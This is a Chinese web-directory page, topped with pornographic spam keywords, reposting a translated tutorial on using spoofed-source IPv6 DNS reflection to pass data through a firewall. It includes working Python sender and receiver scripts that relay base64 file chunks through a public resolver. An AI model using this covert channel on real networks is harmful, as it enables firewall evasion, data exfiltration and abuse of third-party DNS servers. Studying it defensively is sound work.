日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網(wǎng)為廣大站長提供免費(fèi)收錄網(wǎng)站服務(wù),提交前請做好本站友鏈:【 網(wǎng)站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(wù)(50元/站),

點(diǎn)擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會(huì)員:747


利用DNS反射繞過防火墻進(jìn)行通信

 

域名系統(tǒng)(Domain Name System)幾乎和互聯(lián)網(wǎng)一樣古老。它的特殊結(jié)構(gòu)也使它早就成為黑客的利用對象。在這篇短文中,我將詳細(xì)描述DNS反射的原理,為什么黑客喜歡使用它,以及你為什么要用它。

讓我們想象一個(gè)網(wǎng)絡(luò)場景,某道防火墻僅允許內(nèi)網(wǎng)和linux軟件安裝包存儲(chǔ)庫以及DNS服務(wù)器進(jìn)行通信。這意味著從攻擊者的計(jì)算機(jī)發(fā)送的數(shù)據(jù)包到達(dá)不了受害者的服務(wù)器,反之亦然。為了突破防御,我們需要“篡改”IP包的源地址,讓防火墻認(rèn)為這個(gè)數(shù)據(jù)包是由白名單中的IP發(fā)出的。

為什么黑客通常會(huì)使用DNS服務(wù)器進(jìn)行反射(DDoS攻擊)?主要原因是DNS回復(fù)流量遠(yuǎn)遠(yuǎn)大于對應(yīng)的請求流量,這樣就可以放大黑客的DoS流量,增強(qiáng)攻擊的破壞力;而另一個(gè)原因則是DNS請求使用的是非面向連接的UDP協(xié)議。因此,現(xiàn)在有不少管理員都在防火墻上配置阻斷DNS流量。

利用DNS反射繞過防火墻進(jìn)行通信

 

為什么你也需要使用DNS反射?假設(shè)你想與上圖中的服務(wù)器通信,能相互交流(例如一個(gè)遠(yuǎn)程shell)。有一個(gè)很容易而且很常見的方法就是創(chuàng)建自己的DNS服務(wù)器,然后通過虛假的DNS查詢進(jìn)行通信。這的確是一個(gè)很好的方法,但我想向你展示一種無需設(shè)置任何額外的服務(wù)器而進(jìn)行通信的方法,只需要利用IPv6即可,它的直連特性(不存在NAT)極大幫助了我們。

以下兩端Python示例代碼可把一個(gè)文件發(fā)送到另一個(gè)臺(tái)電腦中,且無需兩臺(tái)機(jī)器能夠互相通信。主要通過把文件拆分成60字節(jié)的數(shù)據(jù)塊(單個(gè)域名的最大長度域),再輔以DNS反射技術(shù)實(shí)現(xiàn)的。

請?jiān)谕耆珜儆谀愕木W(wǎng)絡(luò)環(huán)境中進(jìn)行以下實(shí)驗(yàn),不要去攻擊任何DNS服務(wù)器。

Sender code:

#!/usr/bin/python3
from kamene.all import *
import base64,time,sys 
dnsaddr = "2620:119:35::35" # OpenDNS as an example
send_delay = 0.8
def send_packet(ip,packet_data):
 encoded_message = base64.b64encode(packet_data.encode('ascii'))+b'-'
 encoded_message_size = len(encoded_message)
 for i in range(0,encoded_message_size,60):
 data = encoded_message[i:i+60]
 DNSpacket = IPv6(dst=dnsaddr,src=ip)/UDP(sport=RandShort())/DNS(id=1337,rd=0,z=0,tc=1,qd=DNSQR(qname=data,qtype="A",qclass="IN"))
 send(DNSpacket,verbose=0)
 time.sleep(send_delay)
if len(sys.argv)<3:
 print(f'{sys.argv[0]}receiver_ipv6_addr data_file')
 sys.exit()
send_packet(sys.argv[1],open(sys.argv[2]).read())

Receiver code:

#!/usr/bin/python3
import logging 
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from kamene.all import *
import base64,sys 
def receive_packet(listen_iface):
 data = bytearray()
 while not b'-' in data :
 DNSPacket = sniff(iface=listen_iface,filter="src port 53",count=1)
 if(DNSPacket[0].haslayer(DNS))and(DNSPacket[0].getlayer(DNS).id==1337):
 data += (DNSPacket[0].getlayer(DNS).qd.qname[:-1])
 print(base64.b64decode(data[:-1]).decode('ascii'),end='')
if len(sys.argv)<2:
 print(f'{sys.argv[0]}listen_interface')
 sys.exit()
receive_packet(sys.argv[1])

引用

https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/

https://kamene.readthedocs.io/en/latest/introduction.html#about-scapy

本文由白帽匯整理并翻譯,不代表白帽匯任何觀點(diǎn)和立場

來源:https://nosec.org/home/detail/2868.html

分享到:
標(biāo)簽:DNS
用戶無頭像

網(wǎng)友整理

注冊時(shí)間:

網(wǎng)站:5 個(gè)   小程序:0 個(gè)  文章:12 篇

  • 51998

    網(wǎng)站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會(huì)員

趕快注冊賬號,推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨(dú)大挑戰(zhàn)2018-06-03

數(shù)獨(dú)一種數(shù)學(xué)游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學(xué)四六

運(yùn)動(dòng)步數(shù)有氧達(dá)人2018-06-03

記錄運(yùn)動(dòng)步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓(xùn)練成績評定2018-06-03

通用課目體育訓(xùn)練成績評定